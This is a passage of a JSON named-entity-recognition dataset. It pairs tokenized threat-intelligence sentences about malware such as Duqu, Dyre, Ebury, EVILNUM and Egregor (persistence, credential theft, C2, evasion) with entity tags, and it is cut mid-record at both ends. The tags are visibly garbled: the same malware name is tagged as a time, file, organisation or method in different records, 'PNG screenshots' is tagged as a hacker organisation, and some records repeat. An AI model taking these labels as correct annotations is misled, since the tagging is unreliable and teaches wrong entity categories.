"Duqu", "to", "spread", "laterally", "by", "copying", "itself", "to", "shares", "it", "has", "enumerated", "and", "for", "which", "it", "has", "obtained", "legitimate", "credentials", "(via", "keylogging", "or", "other", "means).", "The", "remote", "host", "is", "then", "infected", "by", "using", "the", "compromised", "credentials", "to", "schedule", "a", "task", "on", "remote", "machines", "that", "executes", "the", "malware." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Adversaries", "can", "instruct", "Duqu", "to", "spread", "laterally", "by", "copying", "itself", "to", "shares", "it", "has", "enumerated", "and", "for", "which", "it", "has", "obtained", "legitimate", "credentials", "(via", "keylogging", "or", "other", "means).", "The", "remote", "host", "is", "then", "infected", "by", "using", "the", "compromised", "credentials", "to", "schedule", "a", "task", "on", "remote", "machines", "that", "executes", "the", "malware." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "the", "Duqu", "command", "and", "control", "is", "operating", "over", "HTTP", "or", "HTTPS,", "Duqu", "uploads", "data", "to", "its", "controller", "by", "appending", "it", "to", "a", "blank", "JPG", "file." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Duqu", "command", "and", "control", "protocol's", "data", "stream", "can", "be", "encrypted", "with", "AES-CBC." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "reconnaissance", "modules", "used", "with", "Duqu", "can", "collect", "information", "on", "network", "configuration." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "The", "discovery", "modules", "used", "with", "Duqu", "can", "collect", "information", "on", "network", "connections." ], "ner_tags": [ "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Adversaries", "can", "instruct", "Duqu", "to", "spread", "laterally", "by", "copying", "itself", "to", "shares", "it", "has", "enumerated", "and", "for", "which", "it", "has", "obtained", "legitimate", "credentials", "(via", "keylogging", "or", "other", "means).", "The", "remote", "host", "is", "then", "infected", "by", "using", "the", "compromised", "credentials", "to", "schedule", "a", "task", "on", "remote", "machines", "that", "executes", "the", "malware." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Duqu", "creates", "a", "new", "service", "that", "loads", "a", "malicious", "driver", "when", "the", "system", "starts.", "When", "Duqu", "is", "active,", "the", "operating", "system", "believes", "that", "the", "driver", "is", "legitimate,", "as", "it", "has", "been", "signed", "with", "a", "valid", "private", "key." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "can", "compress", "files", "via", "RAR", "while", "staging", "data", "to", "be", "exfiltrated." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "has", "exfiltrated", "data", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "has", "two", "hard-coded", "domains", "for", "C2", "servers;", "if", "the", "first", "does", "not", "respond,", "it", "will", "try", "the", "second." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "can", "delete", "files", "it", "creates", "from", "the", "infected", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "scans", "the", "victim", "for", "files", "that", "contain", "certain", "keywords", "and", "document", "types", "including", "PDF,", "DOC,", "DOCX,", "XLS,", "and", "XLSX,", "from", "a", "list", "that", "is", "obtained", "from", "the", "C2", "as", "a", "text", "file.", "It", "can", "also", "identify", "logical", "drives", "for", "the", "infected", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "contains", "a", "keylogger." ], "ner_tags": [ "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "DustySky", "searches", "for", "network", "drives", "and", "removable", "media", "and", "duplicates", "itself", "onto", "them." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Features", "O", "O", "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "created", "folders", "in", "temp", "directories", "to", "host", "collected", "files", "before", "exfiltration." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "DustySky", "dropper", "uses", "a", "function", "to", "obfuscate", "the", "name", "of", "functions", "and", "other", "parts", "of", "the", "malware." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "can", "detect", "connected", "USB", "devices." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "collects", "information", "about", "running", "processes", "from", "victims." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "achieves", "persistence", "by", "creating", "a", "Registry", "entry", "in", "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "DustySky", "searches", "for", "removable", "media", "and", "duplicates", "itself", "onto", "it." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "captures", "PNG", "screenshots", "of", "the", "main", "screen." ], "ner_tags": [ "B-Way", "O", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "checks", "for", "the", "existence", "of", "anti-virus." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "lists", "all", "installed", "software", "for", "the", "infected", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "extracts", "basic", "information", "about", "the", "operating", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DustySky", "has", "used", "both", "HTTP", "and", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "The", "DustySky", "dropper", "uses", "Windows", "Management", "Instrumentation", "to", "extract", "information", "about", "the", "operating", "system", "and", "whether", "an", "anti-virus", "is", "active." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "B-Tool", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "decrypts", "resources", "needed", "for", "targeting", "the", "victim." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "injects", "into", "other", "processes", "to", "load", "modules." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "has", "the", "ability", "to", "send", "information", "staged", "on", "a", "compromised", "host", "externally", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "has", "a", "command", "to", "download", "and", "executes", "additional", "files." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "B-Features", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Dyre", "has", "the", "ability", "to", "create", "files", "in", "a", "TEMP", "folder", "to", "act", "as", "a", "database", "to", "store", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Dyre", "has", "the", "ability", "to", "directly", "inject", "its", "code", "into", "the", "web", "browser", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "has", "the", "ability", "to", "achieve", "persistence", "by", "adding", "a", "new", "task", "in", "the", "task", "scheduler", "to", "run", "every", "minute." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "has", "the", "ability", "to", "identify", "installed", "programs", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "has", "been", "delivered", "with", "encrypted", "resources", "and", "must", "be", "unpacked", "for", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "can", "detect", "sandbox", "analysis", "environments", "by", "inspecting", "the", "process", "list", "and", "Registry." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "has", "the", "ability", "to", "identify", "the", "computer", "name,", "OS", "version,", "and", "hardware", "configuration", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "has", "the", "ability", "to", "identify", "network", "settings", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "has", "the", "ability", "to", "identify", "the", "users", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "has", "the", "ability", "to", "identify", "running", "services", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Dyre", "uses", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Dyre", "registers", "itself", "as", "a", "service", "by", "adding", "several", "Registry", "keys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "B-Features", "B-Way" ] }, { "tokens": [ "ECCENTRICBANDWAGON", "can", "delete", "log", "files", "generated", "from", "the", "malware", "stored", "at", "<code>C:\\windows\\temp\\tmp0207</code>." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ECCENTRICBANDWAGON", "can", "capture", "and", "store", "keystrokes." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "ECCENTRICBANDWAGON", "has", "stored", "keystrokes", "and", "screenshots", "within", "the", "<code>%temp%\\GoogleChrome</code>,", "<code>%temp%\\Downloads</code>,", "and", "<code>%temp%\\TrendMicroUpdate</code>", "directories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ECCENTRICBANDWAGON", "has", "encrypted", "strings", "with", "RC4." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ECCENTRICBANDWAGON", "can", "capture", "screenshots", "and", "store", "them", "locally." ], "ner_tags": [ "B-Idus", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "ECCENTRICBANDWAGON", "can", "use", "cmd", "to", "execute", "commands", "on", "a", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EKANS", "uses", "standard", "encryption", "library", "functions", "to", "encrypt", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "EKANS", "stops", "processes", "related", "to", "security", "and", "management", "software." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EKANS", "removes", "backups", "of", "Volume", "Shadow", "Copies", "to", "disable", "any", "restoration", "capabilities." ], "ner_tags": [ "B-SamFile", "O", "B-HackOrg", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EKANS", "has", "been", "disguised", "as", "<code>update.exe</code>", "to", "appear", "as", "a", "valid", "executable." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EKANS", "uses", "encoded", "strings", "in", "its", "process", "kill", "list." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EKANS", "looks", "for", "processes", "from", "a", "hard-coded", "list." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "EKANS", "stops", "database,", "data", "backup", "solution,", "antivirus,", "and", "ICS-related", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "EKANS", "can", "determine", "the", "domain", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EKANS", "can", "use", "Windows", "Mangement", "Instrumentation", "(WMI)", "calls", "to", "execute", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "B-Exp", "B-SecTeam", "B-SecTeam", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "ELMER", "is", "capable", "of", "performing", "directory", "listings." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "ELMER", "is", "capable", "of", "performing", "process", "listings." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "ELMER", "uses", "HTTP", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "EVILNUM", "can", "upload", "files", "over", "the", "C2", "channel", "from", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EVILNUM", "has", "a", "function", "called", "\"DeleteLeftovers\"", "to", "remove", "certain", "artifacts", "of", "the", "attack." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "B-OffAct" ] }, { "tokens": [ "EVILNUM", "can", "download", "and", "upload", "files", "to", "the", "victim's", "computer." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "EVILNUM", "can", "make", "modifications", "to", "the", "Regsitry", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "EVILNUM", "has", "used", "a", "one-way", "communication", "method", "via", "GitLab", "and", "Digital", "Point", "to", "perform", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "EVILNUM", "can", "achieve", "persistence", "through", "the", "Registry", "Run", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EVILNUM", "can", "run", "a", "remote", "scriptlet", "that", "drops", "a", "file", "and", "executes", "it", "via", "regsvr32.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "EVILNUM", "can", "execute", "commands", "and", "scripts", "through", "rundll32." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "EVILNUM", "can", "search", "for", "anti-virus", "products", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EVILNUM", "can", "harvest", "cookies", "and", "upload", "them", "to", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EVILNUM", "can", "obtain", "the", "computer", "name", "from", "the", "victim's", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EVILNUM", "can", "obtain", "the", "username", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EVILNUM", "has", "changed", "the", "creation", "date", "of", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EVILNUM", "has", "used", "the", "Windows", "Management", "Instrumentation", "(WMI)", "tool", "to", "enumerate", "infected", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Ebury", "can", "automatically", "exfiltrate", "gathered", "SSH", "credentials." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "installed", "a", "self-signed", "RPM", "package", "mimicking", "the", "original", "system", "package", "on", "RPM", "based", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "been", "embedded", "into", "modified", "OpenSSH", "binaries", "to", "gain", "persistent", "access", "to", "SSH", "credential", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "Ebury", "has", "used", "DNS", "requests", "over", "UDP", "port", "53", "for", "C2." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "verified", "C2", "domain", "ownership", "by", "decrypting", "the", "TXT", "record", "using", "an", "embedded", "RSA", "public", "key." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Ebury", "can", "disable", "SELinux", "Role-Based", "Access", "Control", "and", "deactivate", "PAM", "modules." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "used", "a", "DGA", "to", "generate", "a", "domain", "name", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "injected", "its", "dynamic", "library", "into", "descendent", "processes", "of", "sshd", "via", "LD_PRELOAD." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Ebury", "can", "exfiltrate", "SSH", "credentials", "through", "custom", "DNS", "queries." ], "ner_tags": [ "B-Idus", "O", "B-SamFile", "B-SamFile", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "implemented", "a", "fallback", "mechanism", "to", "begin", "using", "a", "DGA", "when", "the", "attacker", "hasn't", "connected", "to", "the", "infected", "system", "for", "three", "days." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "can", "list", "directory", "entries." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Ebury", "can", "hook", "logging", "functions", "so", "that", "nothing", "from", "the", "backdoor", "gets", "sent", "to", "the", "logging", "facility." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "can", "intercept", "private", "keys", "using", "a", "trojanized", "<code>ssh-add</code>", "function." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "obfuscated", "its", "strings", "with", "a", "simple", "XOR", "encryption", "with", "a", "static", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "can", "deactivate", "PAM", "modules", "to", "tamper", "with", "the", "sshd", "configuration." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "intercepted", "unencrypted", "private", "keys", "as", "well", "as", "private", "key", "pass-phrases." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "used", "Python", "to", "implement", "its", "DGA." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "used", "user", "mode", "rootkit", "techniques", "to", "remain", "hidden", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "encoded", "C2", "traffic", "in", "hexadecimal", "format." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ebury", "has", "encrypted", "C2", "traffic", "using", "the", "client", "IP", "address,", "then", "encoded", "it", "as", "a", "hexadecimal", "string." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ecipekac", "has", "used", "a", "valid,", "legitimate", "digital", "signature", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ecipekac", "can", "abuse", "the", "legitimate", "application", "policytool.exe", "to", "load", "a", "malicious", "DLL." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ecipekac", "has", "the", "ability", "to", "decrypt", "fileless", "loader", "modules." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Ecipekac", "can", "download", "additional", "payloads", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Ecipekac", "can", "use", "XOR,", "AES,", "and", "DES", "to", "encrypt", "loader", "shellcode." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "used", "BITSadmin", "to", "download", "and", "execute", "malicious", "DLLs." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "used", "DLL", "side-loading", "to", "execute", "its", "payload." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "can", "encrypt", "all", "non-system", "files", "using", "a", "hybrid", "AES-RSA", "algorithm", "prior", "to", "displaying", "a", "ransom", "note." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "can", "collect", "any", "files", "found", "in", "the", "enumerated", "drivers", "before", "sending", "it", "to", "its", "C2", "channel." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "been", "decrypted", "before", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "disabled", "Windows", "Defender", "to", "evade", "protections." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "can", "conduct", "Active", "Directory", "reconnaissance", "using", "tools", "such", "as", "Sharphound", "or", "AdFind." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Egregor", "can", "modify", "the", "GPO", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "the", "ability", "to", "download", "files", "from", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "masqueraded", "the", "svchost.exe", "process", "to", "exfiltrate", "data." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "used", "the", "Windows", "API", "to", "make", "detection", "more", "difficult." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "used", "an", "encoded", "PowerShell", "command", "by", "a", "service", "created", "by", "Cobalt", "Strike", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "Egregor", "can", "inject", "its", "payload", "into", "iexplore.exe", "process." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Egregor", "has", "used", "regsvr32.exe", "to", "execute", "malicious", "DLLs." ], "ner_tags": [ "B-Time", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "checked", "for", "the", "LogMein", "event", "log", "in", "an", "attempt", "to", "encrypt", "files", "in", "remote", "machines." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "used", "rundll32", "during", "execution." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Egregor's", "payloads", "are", "custom-packed,", "archived", "and", "encrypted", "to", "prevent", "analysis." ], "ner_tags": [ "B-Time", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "can", "perform", "a", "language", "check", "of", "the", "infected", "system", "and", "can", "query", "the", "CPU", "information", "(cupid)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "can", "enumerate", "all", "connected", "drives." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "used", "tools", "to", "gather", "information", "about", "users." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "Egregor", "contains", "functionality", "to", "query", "the", "local/system", "time." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "can", "perform", "a", "long", "sleep", "(greater", "than", "or", "equal", "to", "3", "minutes)", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Egregor", "has", "used", "multiple", "anti-analysis", "and", "anti-sandbox", "techniques", "to", "prevent", "automated", "analysis", "by", "sandboxes." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", 